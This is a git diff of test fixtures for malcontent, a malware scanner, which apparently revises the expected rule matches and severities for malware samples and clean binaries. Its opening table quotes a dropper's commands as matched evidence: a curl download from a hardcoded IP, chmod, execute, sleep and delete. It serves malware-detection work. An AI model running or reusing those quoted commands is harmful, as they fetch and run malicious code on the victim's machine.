[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code) | | CRITICAL | [evasion/run_sleep_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/run_sleep_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) | | CRITICAL | [net/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) | -| CRITICAL | [process/chdir/unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir-unusual.yara#unusual_cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | +| CRITICAL | [process/chdir/unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | | HIGH | [ref/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/ip_port.yara#hardcoded_ip_port) | hardcoded IP:port destination | [179.191.68.85:82](https://github.com/search?q=179.191.68.85%3A82&type=code) | | HIGH | [ref/site/http/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/site/http-ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Ex](http://179.191.68.85:82/vendor/sebastian/diff/src/Ex) | | MEDIUM | [fs/file/make_executable](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-make_executable.yara#chmod_executable_shell) | makes file executable | [chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code) | diff --git a/test_data/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/test_data/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple index bcfb9165..a1272979 100644 --- a/test_data/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple +++ b/test_data/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple @@ -2,6 +2,7 @@ 3P/elastic/threat: high combo/backdoor/kill_rm: medium combo/botnet/systemctl: critical +combo/degrader/linux_paths: high combo/dropper/shell: medium combo/stealer/linux_server: high combo/stealer/ssh: high diff --git a/test_data/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple b/test_data/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple index e1e931de..cbf49731 100644 --- a/test_data/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple +++ b/test_data/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple 
@@ -18,7 +18,6 @@ env/HOME: low
 evasion/base64/commands: high
 evasion/base64/http: high
 evasion/elf/sus_header: critical
-evasion/fake/process: critical
 exfil/discord: critical
 fs/file/delete: low
 fs/file/make_executable: high
diff --git a/test_data/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/test_data/linux/2024.kworker_pretenders/emp3r0r.agent.simple
index 96ece9d4..39c126a3 100644
--- a/test_data/linux/2024.kworker_pretenders/emp3r0r.agent.simple
+++ b/test_data/linux/2024.kworker_pretenders/emp3r0r.agent.simple
@@ -8,7 +8,6 @@ archives/unarchive: medium
 archives/zip: medium
 combo/backdoor/kill_rm: medium
 combo/backdoor/net_exec: medium
-combo/critical_paths: medium
 combo/exploit/overflow/shellcode: high
 combo/exploit/pwnkit: critical
 combo/net/host_port: medium
@@ -107,7 +106,7 @@ net/websocket: medium
 persist/crontab: medium
 persist/pid_file: medium
 process/chdir: low
-process/chdir/unusual: high
+process/chdir/unusual: medium
 process/chroot: low
 process/groupid/set: low
 process/groups/set: low
diff --git a/test_data/linux/2024.kworker_pretenders/gafgyt.simple b/test_data/linux/2024.kworker_pretenders/gafgyt.simple
index 013af2a1..70731dfa 100644
--- a/test_data/linux/2024.kworker_pretenders/gafgyt.simple
+++ b/test_data/linux/2024.kworker_pretenders/gafgyt.simple
@@ -1,7 +1,7 @@
 # linux/2024.kworker_pretenders/gafgyt: critical
 3P/elastic/mirai: critical
 3P/threat_hunting/base64: medium
-combo/critical_paths: medium
+combo/degrader/linux_paths: high
 encoding/base64: low
 evasion/base64/eval: high
 evasion/base64/external: medium
diff --git a/test_data/linux/2024.medusa/rkload.simple b/test_data/linux/2024.medusa/rkload.simple
index 9489002c..bc60507a 100644
--- a/test_data/linux/2024.medusa/rkload.simple
+++ b/test_data/linux/2024.medusa/rkload.simple
@@ -1,6 +1,7 @@
 # linux/2024.medusa/rkload: critical
 3P/elastic/orbit: critical
 admin/system_directories: medium
+combo/degrader/linux_paths: high
 dylib/address/check: low
 dylib/symbol/address: medium
 env/GCONV_PATH: low
diff --git a/test_data/linux/clean/busybox.simple b/test_data/linux/clean/busybox.simple
new file mode 100644
index 00000000..bf7e33a0
--- /dev/null
+++ b/test_data/linux/clean/busybox.simple
@@ -0,0 +1,90 @@
+# linux/clean/busybox: high
+admin/logs/current_logins: medium
+combo/degrader/infection: medium
+combo/degrader/linux_paths: high
+combo/net/raw_flooder: medium
+combo/net/scan_tool: medium
+compression/bzip2: low
+compression/gzip: low
+encoding/base64: low
+env/HOME: low
+env/LANG: low
+env/LD_LIBRARY_PATH: low
+env/SHELL: low
+env/TERM: low
+env/TMPDIR: low
+env/USER: low
+exec/program: medium
+exec/program/background: low
+fs/directory/create: low
+fs/directory/remove: low
+fs/fifo/create: low
+fs/file/copy: medium
+fs/file/delete: low
+fs/file/times/set: medium
+fs/file/truncate: low
+fs/link/read: low
+fs/lock/update: low
+fs/mount: low
+fs/mounts/read: medium
+fs/node/create: low
+fs/permission/chown: low
+fs/permission/modify: medium
+fs/symlink/resolve: low
+fs/tempdir: low
+fs/tempdir/create: low
+fs/tempfile/create: low
+fs/watch: low
+group/lookup: medium
+kernel/cpu/info: low
+kernel/hostname/set: low
+kernel/pivot_root: low
+kernel/platform: low
+kernel/ptrace: medium
+kernel/sysinfo: medium
+net/hostname/resolve: low
+net/hostport/parse: low
+net/icmp: medium
+net/interface/get: low
+net/ip/multicast/send: low
+net/ip/parse: medium
+net/ip/string: medium
+net/raw_sockets: medium
+net/socket/local/address: low
+net/socket/receive: low
+net/socket/send: low
+net/stat: medium
+net/tcp/state_tracker: medium
+process/chdir: low
+process/chroot: low
+process/create: low
+process/executable_path: low
+process/find: medium
+process/groupid/set: low
+process/groups/set: low
+process/namespace/set: low
+process/parent_pid/get: low
+process/userid/set: low
+process/username/get: medium
+procfs/arbitrary/pid: medium
+procfs/meminfo: medium
+procfs/mounts: medium
+procfs/stat: medium
+random/insecure: low
+ref/daemon: medium
+ref/ip_port: medium
+ref/path/etc: low
+ref/path/home: medium
+ref/path/tmp: medium
+ref/path/usr/bin: low
+ref/path/usr/sbin: low
+ref/path/var: low
+ref/path/var/log: medium
+ref/site/url: low
+ref/words/password: low
+secrets/gshadow: medium
+secrets/shadow: medium
+shell/exec: medium
+time/clock/set: low
+tty/parameters/get: medium
+tty/pathname: medium
diff --git a/test_data/linux/clean/chezmoi.simple b/test_data/linux/clean/chezmoi.simple
index 85244232..8c370f38 100644
--- a/test_data/linux/clean/chezmoi.simple
+++ b/test_data/linux/clean/chezmoi.simple
@@ -139,7 +139,6 @@ ref/site/download: medium
 ref/site/github_api: low
 ref/site/http/dynamic: medium
 ref/site/url: low
-ref/words/backdoor: high
 ref/words/dropper: medium
 ref/words/exclamation: medium
 ref/words/exploit: medium
diff --git a/test_data/linux/clean/chrome.simple b/test_data/linux/clean/chrome.simple
index 281bbbf9..8790bdae 100644
--- a/test_data/linux/clean/chrome.simple
+++ b/test_data/linux/clean/chrome.simple
@@ -2,7 +2,6 @@
 3P/threat_hunting/metasploit: medium
 3P/threat_hunting/proxmark: medium
 archives/zip: medium
-combo/critical_paths: medium
 combo/net/tunnel_proxy: medium
 compression/bzip2: low
 compression/gzip: low
diff --git a/test_data/linux/clean/clickhouse.simple b/test_data/linux/clean/clickhouse.simple
index e4ae2a5a..63d0253d 100644
--- a/test_data/linux/clean/clickhouse.simple
+++ b/test_data/linux/clean/clickhouse.simple
@@ -7,7 +7,6 @@ admin/package/install: medium
 admin/shutdown: medium
 builtin/openssl: medium
 cloud/google/metadata: low
-combo/critical_paths: medium
 combo/dropper/shell: medium
 combo/miner/argon2d_numa_self: high
 combo/net/tunnel_proxy: medium
@@ -68,7 +67,6 @@ fs/mounts/read: medium
 fs/node/create: low
 fs/permission/chown: low
 fs/permission/modify: medium
-fs/permission/modify/dangerous: medium
 fs/symlink/resolve: low
 fs/tempdir: low
 fs/tempdir/create: low
@@ -82,7 +80,6 @@ kernel/acct: low
 kernel/cpu/info: low
 kernel/dev/block/device: medium
 kernel/hostname/get: low
-kernel/module/load: medium
 kernel/netlink: low
 kernel/opencl: medium
 kernel/platform: low
diff --git a/test_data/linux/clean/code-oss.md b/test_data/linux/clean/code-oss.md
index 5b6851e3..50932184 100644
--- a/test_data/linux/clean/code-oss.md +++ b/test_data/linux/clean/code-oss.md @@ -6,7 +6,6 @@ | MEDIUM | [3P/threat_hunting/google/remote/desktop](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Google_Remote_Desktop_greyware_tool_keyword) | [references 'Google Remote Desktop' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [inomeogfingihgjfjlpeplalcfajhgai](https://github.com/search?q=inomeogfingihgjfjlpeplalcfajhgai&type=code) | | MEDIUM | [3P/threat_hunting/proxmark](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Proxmark_offensive_tool_keyword) | [references 'Proxmark' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [ProxMark](https://github.com/search?q=ProxMark&type=code) | | MEDIUM | [archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) | -| MEDIUM | [combo/critical_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/critical_paths.yara#linux_critical_system_paths_medium) | accesses multiple critical Linux paths | [/proc/cpH](https://github.com/search?q=%2Fproc%2FcpH&type=code)
[/proc/cpuinfo](https://github.com/search?q=%2Fproc%2Fcpuinfo&type=code)
[/proc/driver/nvidia/params](https://github.com/search?q=%2Fproc%2Fdriver%2Fnvidia%2Fparams&type=code)
[/proc/loadavg](https://github.com/search?q=%2Fproc%2Floadavg&type=code)
[/proc/meH](https://github.com/search?q=%2Fproc%2FmeH&type=code)
[/proc/meminfo](https://github.com/search?q=%2Fproc%2Fmeminfo&type=code)
[/proc/seH](https://github.com/search?q=%2Fproc%2FseH&type=code)
[/proc/self/cmdline](https://github.com/search?q=%2Fproc%2Fself%2Fcmdline&type=code)
[/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code)
[/proc/self/fdinfo/](https://github.com/search?q=%2Fproc%2Fself%2Ffdinfo%2F&type=code)
[/proc/self/gid_map](https://github.com/search?q=%2Fproc%2Fself%2Fgid_map&type=code)
[/proc/self/maps](https://github.com/search?q=%2Fproc%2Fself%2Fmaps&type=code)
[/proc/self/mem](https://github.com/search?q=%2Fproc%2Fself%2Fmem&type=code)
[/proc/self/ns/ipc](https://github.com/search?q=%2Fproc%2Fself%2Fns%2Fipc&type=code)
[/proc/self/ns/mnt](https://github.com/search?q=%2Fproc%2Fself%2Fns%2Fmnt&type=code)
[/proc/self/ns/net](https://github.com/search?q=%2Fproc%2Fself%2Fns%2Fnet&type=code)
[/proc/self/ns/pid](https://github.com/search?q=%2Fproc%2Fself%2Fns%2Fpid&type=code)
[/proc/self/ns/user](https://github.com/search?q=%2Fproc%2Fself%2Fns%2Fuser&type=code)
[/proc/self/ns/uts](https://github.com/search?q=%2Fproc%2Fself%2Fns%2Futs&type=code)
[/proc/self/setgroups](https://github.com/search?q=%2Fproc%2Fself%2Fsetgroups&type=code)
[/proc/self/status](https://github.com/search?q=%2Fproc%2Fself%2Fstatus&type=code)
[/proc/self/uid_map](https://github.com/search?q=%2Fproc%2Fself%2Fuid_map&type=code)
[/proc/stat](https://github.com/search?q=%2Fproc%2Fstat&type=code)
[/proc/sys/fs/inotify/max_user_watches](https://github.com/search?q=%2Fproc%2Fsys%2Ffs%2Finotify%2Fmax_user_watches&type=code)
[/proc/sys/fs/nr_open](https://github.com/search?q=%2Fproc%2Fsys%2Ffs%2Fnr_open&type=code)
[/proc/sys/kernel/yama/ptrace_scope](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fyama%2Fptrace_scope&type=code)
[/proc/tty/drivers](https://github.com/search?q=%2Fproc%2Ftty%2Fdrivers&type=code)
[/proc/uptime](https://github.com/search?q=%2Fproc%2Fuptime&type=code)
[/sys/class/bluetooth](https://github.com/search?q=%2Fsys%2Fclass%2Fbluetooth&type=code)
[/sys/class/input](https://github.com/search?q=%2Fsys%2Fclass%2Finput&type=code)
[/sys/class/tty/tty0/active](https://github.com/search?q=%2Fsys%2Fclass%2Ftty%2Ftty0%2Factive&type=code)
[/sys/class/video4linux/](https://github.com/search?q=%2Fsys%2Fclass%2Fvideo4linux%2F&type=code)
[/sys/devices/system/cpu/cpu0/tsc_freq_khz](https://github.com/search?q=%2Fsys%2Fdevices%2Fsystem%2Fcpu%2Fcpu0%2Ftsc_freq_khz&type=code)
[/sys/devices/virtual/misc/uhid](https://github.com/search?q=%2Fsys%2Fdevices%2Fvirtual%2Fmisc%2Fuhid&type=code)
[/tmp/__v8_gc__](https://github.com/search?q=%2Ftmp%2F__v8_gc__&type=code)
[/tmp/chromium-upload-XXXXXXXXXXXXXXXX](https://github.com/search?q=%2Ftmp%2Fchromium-upload-XXXXXXXXXXXXXXXX&type=code)
[/tmp/node-repl-sock](https://github.com/search?q=%2Ftmp%2Fnode-repl-sock&type=code)
[/tmp/perf-](https://github.com/search?q=%2Ftmp%2Fperf-&type=code)
[/tmp/perfetto-consumer](https://github.com/search?q=%2Ftmp%2Fperfetto-consumer&type=code)
[/tmp/perfetto-producer](https://github.com/search?q=%2Ftmp%2Fperfetto-producer&type=code)
[/usr/bin/wget](https://github.com/search?q=%2Fusr%2Fbin%2Fwget&type=code)
[/var/run/user](https://github.com/search?q=%2Fvar%2Frun%2Fuser&type=code) |
 | MEDIUM | [combo/net/tunnel_proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [Proxy](https://github.com/search?q=Proxy&type=code)
[SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[Tunnel](https://github.com/search?q=Tunnel&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) |
 | MEDIUM | [crypto/rc4/constants](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4-constants.yara#rc4_constants) | [rc4 constants](https://blog.talosintelligence.com/2014/06/an-introduction-to-recognizing-and.html), by shellcromancer | [#"!](https://github.com/search?q=%23%22%21&type=code)
$opt0
$opt1
$opt2
$opt30
$opt4
$opt5
$opt6
$opt7
['&%$](https://github.com/search?q=%27%26%25%24&type=code)
[+*)(](https://github.com/search?q=%2B%2A%29%28&type=code)
[/.-,](https://github.com/search?q=%2F.-%2C&type=code)
[3210](https://github.com/search?q=3210&type=code)
[7654](https://github.com/search?q=7654&type=code)
[;:98](https://github.com/search?q=%3B%3A98&type=code)
[?>=<](https://github.com/search?q=%3F%3E%3D%3C&type=code)
[CBA@](https://github.com/search?q=CBA%40&type=code)
[GFED](https://github.com/search?q=GFED&type=code)
[KJIH](https://github.com/search?q=KJIH&type=code)
[ONML](https://github.com/search?q=ONML&type=code)
[SRQP](https://github.com/search?q=SRQP&type=code)
[WVUT](https://github.com/search?q=WVUT&type=code)
[[ZYX](https://github.com/search?q=%5BZYX&type=code)
[_^]\](https://github.com/search?q=_%5E%5D%5C&type=code)
[cba`](https://github.com/search?q=cba%60&type=code)
[gfed](https://github.com/search?q=gfed&type=code)
[kjih](https://github.com/search?q=kjih&type=code)
[onml](https://github.com/search?q=onml&type=code)
[srqp](https://github.com/search?q=srqp&type=code)
[wvut](https://github.com/search?q=wvut&type=code)
[{zyx](https://github.com/search?q=%7Bzyx&type=code)
[](https://github.com/search?q=%83%82%81%80&type=code)
[](https://github.com/search?q=%87%86%85%84&type=code)
[](https://github.com/search?q=%8B%8A%89%88&type=code)
[](https://github.com/search?q=%8F%8E%8D%8C&type=code)
[](https://github.com/search?q=%93%92%91%90&type=code)
[](https://github.com/search?q=%97%96%95%94&type=code)
[](https://github.com/search?q=%9B%9A%99%98&type=code)
[](https://github.com/search?q=%9F%9E%9D%9C&type=code)
[](https://github.com/search?q=%A3%A2%A1%A0&type=code)
[](https://github.com/search?q=%A7%A6%A5%A4&type=code)
[](https://github.com/search?q=%AB%AA%A9%A8&type=code)
[](https://github.com/search?q=%AF%AE%AD%AC&type=code)
[](https://github.com/search?q=%B3%B2%B1%B0&type=code)
[](https://github.com/search?q=%B7%B6%B5%B4&type=code)
[](https://github.com/search?q=%BB%BA%B9%B8&type=code)
[](https://github.com/search?q=%BF%BE%BD%BC&type=code)
[](https://github.com/search?q=%C3%C2%C1%C0&type=code)
[](https://github.com/search?q=%C7%C6%C5%C4&type=code)
[](https://github.com/search?q=%CB%CA%C9%C8&type=code)
[](https://github.com/search?q=%CF%CE%CD%CC&type=code)
[](https://github.com/search?q=%D3%D2%D1%D0&type=code)
[](https://github.com/search?q=%D7%D6%D5%D4&type=code)
[](https://github.com/search?q=%DB%DA%D9%D8&type=code)
[](https://github.com/search?q=%DF%DE%DD%DC&type=code)
[](https://github.com/search?q=%E3%E2%E1%E0&type=code)
[](https://github.com/search?q=%E7%E6%E5%E4&type=code)
[](https://github.com/search?q=%EB%EA%E9%E8&type=code)
[](https://github.com/search?q=%EF%EE%ED%EC&type=code)
[](https://github.com/search?q=%F3%F2%F1%F0&type=code)
[](https://github.com/search?q=%F7%F6%F5%F4&type=code)
[](https://github.com/search?q=%FB%FA%F9%F8&type=code)
[](https://github.com/search?q=%FF%FE%FD%FC&type=code) |
 | MEDIUM | [data/embedded/base64/terms](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded-base64-terms.yara#contains_base64) | Contains base64 CERTIFICATE | [Q0VSVElGSUNBVE::$CERTIFICATE](https://github.com/search?q=Q0VSVElGSUNBVE%3A%3A%24CERTIFICATE&type=code)
[RpcmVjdG9ye::$directory](https://github.com/search?q=RpcmVjdG9ye%3A%3A%24directory&type=code)
[ZGlyZWN0b3J5::$directory](https://github.com/search?q=ZGlyZWN0b3J5%3A%3A%24directory&type=code) |
diff --git a/test_data/linux/clean/containerd.simple b/test_data/linux/clean/containerd.simple
index 0681283f..e14c0120 100644
--- a/test_data/linux/clean/containerd.simple
+++ b/test_data/linux/clean/containerd.simple
@@ -2,7 +2,7 @@
 3P/threat_hunting/hijacker: medium
 3P/threat_hunting/privilegeescalation: medium
 archives/zip: medium
-combo/critical_paths: medium
+combo/degrader/linux_paths: medium
 combo/net/host_port: medium
 compression/bzip2: low
 compression/gzip: low
diff --git a/test_data/linux/clean/emscripten.sh.simple b/test_data/linux/clean/emscripten.sh.simple
new file mode 100644
index 00000000..f7312e43
--- /dev/null
+++ b/test_data/linux/clean/emscripten.sh.simple
@@ -0,0 +1,13 @@
+# linux/clean/emscripten.sh: medium
+combo/dropper/shell: medium
+fs/file/delete: medium
+fs/file/delete/forcibly: low
+fs/file/make_executable: medium
+fs/permission/modify: medium
+net/fetch: medium
+process/chdir: low
+ref/path/hidden: medium
+ref/path/relative: medium
+ref/path/root: medium
+ref/path/tmp: medium
+ref/site/url: low
diff --git a/test_data/linux/clean/http-fingerprints.lua.simple b/test_data/linux/clean/http-fingerprints.lua.simple
new file mode 100644
index 00000000..9157d65d
--- /dev/null
+++ b/test_data/linux/clean/http-fingerprints.lua.simple
@@ -0,0 +1,28 @@
+# linux/clean/http-fingerprints.lua: high
+3P/signature_base/hacktool/strings: medium
+3P/threat_hunting/metasploit: medium
+3P/threat_hunting/nikto: medium
+3P/threat_hunting/rapid7: medium
+3P/threat_hunting/seclists: medium
+databases/mysql: medium
+fs/file/read: low
+net/download: medium
+net/http/post: medium
+net/http/request: low
+net/ssh: medium
+net/upload: medium
+ref/cve: medium
+ref/path/etc: low
+ref/path/home: medium
+ref/path/root: medium
+ref/path/tmp: medium
+ref/path/var: low
+ref/program/nmap: medium
+ref/site/grayware: high
+ref/site/php: medium
+ref/site/url: low
+ref/words/agent: medium
+ref/words/password: low
+ref/words/plugin: low
+secrets/htpasswd: medium
+tools/vulncheck/metasploit: high
diff --git a/test_data/linux/clean/kuma-cp.simple b/test_data/linux/clean/kuma-cp.simple
index 3d58461a..20cafb61 100644
--- a/test_data/linux/clean/kuma-cp.simple
+++ b/test_data/linux/clean/kuma-cp.simple
@@ -3,7 +3,6 @@
 3P/threat_hunting/privilegeescalation: medium
 archives/zip: medium
 combo/backdoor/iptables: medium
-combo/critical_paths: medium
 combo/dropper/shell: medium
 combo/net/host_port: medium
 combo/net/tunnel_proxy: medium
diff --git a/test_data/linux/clean/linux-s390x.sh.simple b/test_data/linux/clean/linux-s390x.sh.simple
new file mode 100644
index 00000000..8d8033b6
--- /dev/null
+++ b/test_data/linux/clean/linux-s390x.sh.simple
@@ -0,0 +1,8 @@
+# linux/clean/linux-s390x.sh: medium
+combo/dropper/shell: medium
+fs/directory/create: low
+fs/permission/modify: medium
+net/fetch: medium
+process/chdir: low
+ref/site/github_raw: medium
+ref/site/url: low
diff --git a/test_data/linux/clean/linux-sparc64.sh.simple b/test_data/linux/clean/linux-sparc64.sh.simple
new file mode 100644
index 00000000..6571d7d0
--- /dev/null
+++ b/test_data/linux/clean/linux-sparc64.sh.simple
@@ -0,0 +1,7 @@
+# linux/clean/linux-sparc64.sh: medium
+combo/dropper/shell: medium
+fs/directory/create: low
+fs/permission/modify: medium
+net/fetch: medium
+process/chdir: low
+ref/site/url: low
diff --git a/test_data/linux/clean/melange.simple b/test_data/linux/clean/melange.simple
index 1bd15fa3..b98a494b 100644
--- a/test_data/linux/clean/melange.simple
+++ b/test_data/linux/clean/melange.simple
@@ -9,7 +9,6 @@ cloud/aws/metadata: low
 cloud/google/metadata: low
 cloud/google/storage: low
 combo/backdoor/kill_rm: medium
-combo/critical_paths: medium
 combo/dropper/shell: medium
 combo/net/tunnel_proxy: medium
 compression/bzip2: low
diff --git a/test_data/linux/clean/minio.x86_64.md b/test_data/linux/clean/minio.x86_64.md
index 72496575..52994098 100644
--- a/test_data/linux/clean/minio.x86_64.md
+++ b/test_data/linux/clean/minio.x86_64.md
@@ -10,7 +10,7 @@
 | MEDIUM | [3P/threat_hunting/torproject](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#torproject_offensive_tool_keyword) | [references 'torproject' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [torproject](https://github.com/search?q=torproject&type=code) |
 | MEDIUM | [archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code)
[zip files](https://github.com/search?q=zip+files&type=code) |
 | MEDIUM | [combo/backdoor/iptables](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/backdoor/iptables.yara#iptables_upload_http) | uploads, uses iptables and HTTP | [HTTP](https://github.com/search?q=HTTP&type=code)
[iptables](https://github.com/search?q=iptables&type=code)
[uploadCONSOLE](https://github.com/search?q=uploadCONSOLE&type=code)
[uploadEnabled](https://github.com/search?q=uploadEnabled&type=code)
[uploadFileFunction](https://github.com/search?q=uploadFileFunction&type=code)
[uploadFilePromises](https://github.com/search?q=uploadFilePromises&type=code)
[uploadFiles](https://github.com/search?q=uploadFiles&type=code)
[uploadFolderAction](https://github.com/search?q=uploadFolderAction&type=code)
[uploadFolderAllowed](https://github.com/search?q=uploadFolderAllowed&type=code)
[uploadFolderFunction](https://github.com/search?q=uploadFolderFunction&type=code)
[uploadID](https://github.com/search?q=uploadID&type=code)
[uploadIdversionsContin](https://github.com/search?q=uploadIdversionsContin&type=code)
[uploadMINIO](https://github.com/search?q=uploadMINIO&type=code)
[uploadObjectAllowed](https://github.com/search?q=uploadObjectAllowed&type=code)
[uploadOptionsOpen](https://github.com/search?q=uploadOptionsOpen&type=code)
[uploadOptionsSetOpen](https://github.com/search?q=uploadOptionsSetOpen&type=code)
[uploadPagesFromURLPrep](https://github.com/search?q=uploadPagesFromURLPrep&type=code)
[uploadPagesFromURLResp](https://github.com/search?q=uploadPagesFromURLResp&type=code)
[uploadPagesPreparer](https://github.com/search?q=uploadPagesPreparer&type=code)
[uploadPagesResponder](https://github.com/search?q=uploadPagesResponder&type=code)
[uploadPartCopyC](https://github.com/search?q=uploadPartCopyC&type=code)
[uploadPartReq](https://github.com/search?q=uploadPartReq&type=code)
[uploadPath](https://github.com/search?q=uploadPath&type=code)
[uploadPreparer](https://github.com/search?q=uploadPreparer&type=code)
[uploadPromise](https://github.com/search?q=uploadPromise&type=code)
[uploadRequest](https://github.com/search?q=uploadRequest&type=code)
[uploadResponder](https://github.com/search?q=uploadResponder&type=code)
[uploadSize](https://github.com/search?q=uploadSize&type=code)
[uploadSourceToTargetUR](https://github.com/search?q=uploadSourceToTargetUR&type=code)
[uploadThe](https://github.com/search?q=uploadThe&type=code)
[uploadTimeoutTimer](https://github.com/search?q=uploadTimeoutTimer&type=code)
[uploadTypeADMIN](https://github.com/search?q=uploadTypeADMIN&type=code)
[uploadUrl](https://github.com/search?q=uploadUrl&type=code)
[uploadedPartRes](https://github.com/search?q=uploadedPartRes&type=code)
[uploadedUnable](https://github.com/search?q=uploadedUnable&type=code)
[uploaderKey](https://github.com/search?q=uploaderKey&type=code)
[uploadincrease](https://github.com/search?q=uploadincrease&type=code)
[uploading](https://github.com/search?q=uploading&type=code)
[uploadminio](https://github.com/search?q=uploadminio&type=code)
[uploadrate](https://github.com/search?q=uploadrate&type=code)
[uploadsX](https://github.com/search?q=uploadsX&type=code)
[uploadsblake](https://github.com/search?q=uploadsblake&type=code)
[uploadsenable](https://github.com/search?q=uploadsenable&type=code)
[uploadsforce](https://github.com/search?q=uploadsforce&type=code)
[uploaduse](https://github.com/search?q=uploaduse&type=code) |
-| MEDIUM | [combo/critical_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/critical_paths.yara#linux_critical_system_paths_medium) | accesses multiple critical Linux paths | [/proc/cmdline/v3/speedtest/v3/top/lock](https://github.com/search?q=%2Fproc%2Fcmdline%2Fv3%2Fspeedtest%2Fv3%2Ftop%2Flock&type=code)
[/proc/errno](https://github.com/search?q=%2Fproc%2Ferrno&type=code)
[/proc/mountspart.](https://github.com/search?q=%2Fproc%2Fmountspart.&type=code)
[/proc/seH](https://github.com/search?q=%2Fproc%2FseH&type=code)
[/proc/self/auxv](https://github.com/search?q=%2Fproc%2Fself%2Fauxv&type=code)
[/proc/self/cpusetError](https://github.com/search?q=%2Fproc%2Fself%2FcpusetError&type=code)
[/proc/self/exerequestPaymentlegacy](https://github.com/search?q=%2Fproc%2Fself%2FexerequestPaymentlegacy&type=code)
[/proc/self/maps](https://github.com/search?q=%2Fproc%2Fself%2Fmaps&type=code)
[/proc/statSyntax](https://github.com/search?q=%2Fproc%2FstatSyntax&type=code)
[/proc/sys/fs/pipe-max-sizeUnable](https://github.com/search?q=%2Fproc%2Fsys%2Ffs%2Fpipe-max-sizeUnable&type=code)
[/proc/sys/kernel/hostnamettfb_seconds_](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostnamettfb_seconds_&type=code)
[/proc/sys/kernel/ngroups_max](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fngroups_max&type=code)
[/proc/sys/kernel/rtsig-max](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Frtsig-max&type=code)
[/proc/sys/kernel/threads-maxbinary](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fthreads-maxbinary&type=code)
[/proc/sys/net/core/somaxconnCurrent](https://github.com/search?q=%2Fproc%2Fsys%2Fnet%2Fcore%2FsomaxconnCurrent&type=code)
